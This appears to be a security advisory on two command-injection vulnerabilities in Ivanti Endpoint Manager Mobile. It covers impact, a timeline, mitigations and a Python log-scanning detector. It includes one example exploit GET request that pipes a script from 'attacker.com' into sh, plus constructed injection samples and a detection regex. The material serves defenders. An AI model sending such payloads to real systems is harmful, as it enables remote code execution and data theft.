Overview/Introduction
On January 29, 2026 Ivanti announced two new critical vulnerabilities in its mobile device management solution, Ivanti Endpoint Manager Mobile (EPMM). The flaws—identified as CVE-2026-1281 and CVE-2026-1340—allow an unauthenticated attacker to inject arbitrary Bash commands via crafted HTTP GET requests. Within days, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2026-1281 to its Known Exploited Vulnerabilities (KEV) catalog and set a Feb 1, 2026 remediation deadline for federal agencies.
Both vulnerabilities have been confirmed in active in‑the‑wild exploitation campaigns, and a public proof‑of‑concept (PoC) was released on January 30, 2026. Ivanti responded with emergency RPM patches for all affected versions and announced a permanent fix in the upcoming 12.8.0.0 release.
Technical Details
Each CVE scores 9.8 (Critical) on the CVSS v3.1 scale and falls under CWE-94: Improper Control of Generation of Code. The root cause is insufficient sanitisation of user‑supplied input in two EPMM web‑service endpoints:
- /mifs/c/appstore/fob/ – the “In‑House Application Distribution” feature.
- /mifs/c/aftstore/fob/ – the “Android File Transfer Configuration” feature.
Attackers embed Bash commands directly into the query string of an HTTP GET request. The vulnerable code concatenates this string into a shell command without proper escaping, resulting in immediate execution on the underlying appliance. Because the service is exposed on the management network and does not require authentication, the attack vector is purely network‑based.
A typical exploit looks like:
GET /mifs/c/appstore/fob/?cmd=;curl%20http://attacker.com/shell.sh|sh HTTP/1.1
Host: victim-epmm.example.com
Successful exploitation grants the attacker system‑level privileges on the EPMM appliance, enabling:
- Extraction of PII (names, emails, phone numbers, GPS data) stored in the MDM database.
- Deployment of web‑shells or reverse shells for persistent access.
- Lateral movement to other devices managed by the compromised appliance.
Impact Analysis
The affected product line is limited to Ivanti Endpoint Manager Mobile (EPMM) 12.5.0.0, 12.6.0.0, 12.7.0.0 and their incremental releases (12.5.1.0, 12.6.1.0). Organizations that rely on EPMM for mobile device enrollment, app distribution, and configuration—spanning federal agencies, large enterprises, and managed service providers—are at risk.
Impact categories include:
- Confidentiality: Direct access to device‑level data (IMEI, GPS, contact lists) and user credentials.
- Integrity: Ability to push malicious applications or alter device policies.
- Availability: Potential for ransomware or destructive commands that shut down the MDM service.
Given the privileged nature of the EPMM appliance within an enterprise network, compromise can serve as a foothold for broader attacks, making the overall risk profile “critical.”
Timeline of Events
- Jan 29, 2026 – Ivanti publicly discloses CVE-2026-1281 and CVE-2026-1340.
- Jan 30, 2026 – Rapid7 and The Hacker News report active exploitation; public PoC released.
- Jan 31, 2026 – CISA adds CVE-2026-1281 to KEV catalog and sets a Feb 1 remediation deadline for federal entities.
- Feb 1, 2026 – Deadline for agencies to patch or remove vulnerable EPMM devices from networks.
- Feb 2, 2026 – Ivanti issues emergency RPM patches for affected versions (12.x.0.x and 12.x.1.x).
- Q1 2026 (later) – Permanent fix scheduled in EPMM 12.8.0.0.
Mitigation/Recommendations
Immediate actions for any organisation running EPMM:
- Apply the emergency RPM patches. The patches are version‑specific (12.x.0.x and 12.x.1.x) and must be re‑applied after any appliance upgrade.
- Block the vulnerable endpoints at the network perimeter. Create firewall rules to deny inbound traffic to /mifs/c/appstore/fob/ and /mifs/c/aftstore/fob/ from untrusted networks.
- Monitor Apache access logs. Look for the following regex pattern to detect exploitation attempts:
  ^(?!127\.0\.0\.1:\d+).*?\/mifs\/c\/(aft|app)store\/fob\/.*?404
  Successful legitimate calls return 200, while suspicious attempts often result in 404 or 500 responses.
- Enable IDS/IPS signatures. Most major vendors have released Snort/Suricata rules targeting the malicious query strings observed in the public PoC.
- Consider disabling the “In‑House Application Distribution” and “Android File Transfer Configuration” features if they are not actively used.
- Perform a forensic review. Search for newly created web‑shells, reverse‑shell binaries, or unusual scheduled tasks on the appliance.
- Plan migration to the upcoming 12.8.0.0 release. The permanent fix will be baked into that version, eliminating the need for post‑upgrade patch re‑application.
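The log-monitoring step above, worked through as an added example (not Ivanti's code or tooling): it applies the advisory's regex to constructed access-log lines and, as a broader check, classifies every non-localhost request to the two endpoints by response status and by URL-decoded shell metacharacters in the query. The log layout (client:port prefix, common-log fields) and all sample lines are assumptions.

```python
import re
from urllib.parse import unquote

# Detection regex quoted from the advisory's mitigation guidance: a request that did not
# originate from 127.0.0.1:<port>, touched either vulnerable endpoint, and ended in a 404.
ADVISORY_RE = re.compile(r"^(?!127\.0\.0\.1:\d+).*?\/mifs\/c\/(aft|app)store\/fob\/.*?404")

# Broader parser for the same two endpoints. Assumed (constructed) log layout:
#   client[:port] - - [timestamp] "METHOD path HTTP/x" status bytes
REQ_RE = re.compile(
    r'^(?P<client>\S+?)(?::\d+)? \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) '
    r'(?P<path>/mifs/c/(?:app|aft)store/fob/\S*) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that have no business in a query string for these features.
SHELL_META = re.compile(r"[;|&`]|\$\(")

def classify(line):
    """Return a verdict dict for a line hitting the watched endpoints, or None otherwise."""
    m = REQ_RE.match(line)
    if not m:
        return None
    status = int(m.group("status"))
    decoded = unquote(m.group("path"))  # decode %3B etc. before looking for metacharacters
    if m.group("client") == "127.0.0.1":
        verdict = "local"              # appliance-internal call, excluded by the advisory regex
    elif SHELL_META.search(decoded):
        verdict = "injection-attempt"  # metacharacters in the query, regardless of status
    elif status == 200:
        verdict = "legitimate"         # advisory: legitimate calls return 200
    else:
        verdict = "suspicious"         # advisory: attempts often return 404 or 500
    return {"client": m.group("client"), "status": status, "path": decoded,
            "verdict": verdict, "advisory_hit": bool(ADVISORY_RE.search(line))}

def scan(lines):
    """Run classify() over an access log and keep only lines that touched the endpoints."""
    return [r for r in map(classify, lines) if r]

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5:51234 - - [30/Jan/2026:10:00:01 +0000] "GET /mifs/c/appstore/fob/?cmd=;id HTTP/1.1" 404 512',
    '127.0.0.1:8080 - - [30/Jan/2026:10:00:02 +0000] "GET /mifs/c/aftstore/fob/ HTTP/1.1" 200 2048',
    '203.0.113.7:40001 - - [30/Jan/2026:10:00:03 +0000] "GET /mifs/c/appstore/fob/?x=%3Bwhoami HTTP/1.1" 500 73',
    '10.0.0.9:33000 - - [30/Jan/2026:10:00:04 +0000] "GET /mifs/c/appstore/fob/ HTTP/1.1" 200 2048',
    '10.0.0.9:33001 - - [30/Jan/2026:10:00:05 +0000] "GET /mifs/c/admin/ HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(f'{r["client"]:<12} {r["status"]} {r["verdict"]:<17} advisory_regex={r["advisory_hit"]} {r["path"]}')
```

Note that the advisory regex alone misses the 500-status attempt in the third sample line; bucketing by status and decoding the query catches it.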
Real-World Impact
Enterprises that have deployed EPMM to manage thousands of employee smartphones are suddenly exposed to a “kill‑chain” that begins with a single unauthenticated HTTP request. In practice, an attacker could:
- Harvest employee location data and contact lists, facilitating spear‑phishing or credential‑stuffing attacks.
- Push a malicious corporate app that exfiltrates data or establishes a persistent backdoor on every enrolled device.
- Leverage the appliance’s privileged network access to pivot onto internal services (e.g., VPN concentrators, file servers).
For government agencies, the CISA deadline underscores the potential national‑security ramifications. Failure to remediate could force agencies to de‑commission EPMM appliances, disrupting mobile‑first initiatives and incurring significant operational costs.
Expert Opinion
From a strategic perspective, the rapid emergence of two independent zero‑days in the same product line signals a deeper issue in Ivanti’s secure‑development lifecycle. The fact that both flaws stem from the same underlying input‑validation weakness suggests that the codebase for the web‑service layer has not been fully hardened against command injection.
For the broader industry, this incident reinforces three key takeaways:
- Zero‑Day Velocity Is Rising. Mobile device management platforms are increasingly attractive targets because they sit at the intersection of corporate data and user devices. Vendors must adopt “bug‑bounty‑first” programs and continuous static analysis to surface such defects before release.
- Patch‑Management Speed Is Critical. The three‑day CISA remediation window is a stark reminder that traditional patch‑testing cycles can leave organisations exposed. Automated, staged roll‑outs and “emergency patch windows” should become a standard part of MDM governance.
- Defense‑in‑Depth Must Include Application‑Layer Controls. Relying solely on network segmentation is insufficient when an appliance exposes unauthenticated HTTP endpoints. Deploying a Web Application Firewall (WAF) with strict request‑validation rules can buy valuable time before patches are applied.
In short, organizations running Ivanti EPMM must treat these vulnerabilities as a top‑priority emergency, apply the patches immediately, and re‑evaluate their overall MDM security posture to prevent future supply‑chain‑style compromises.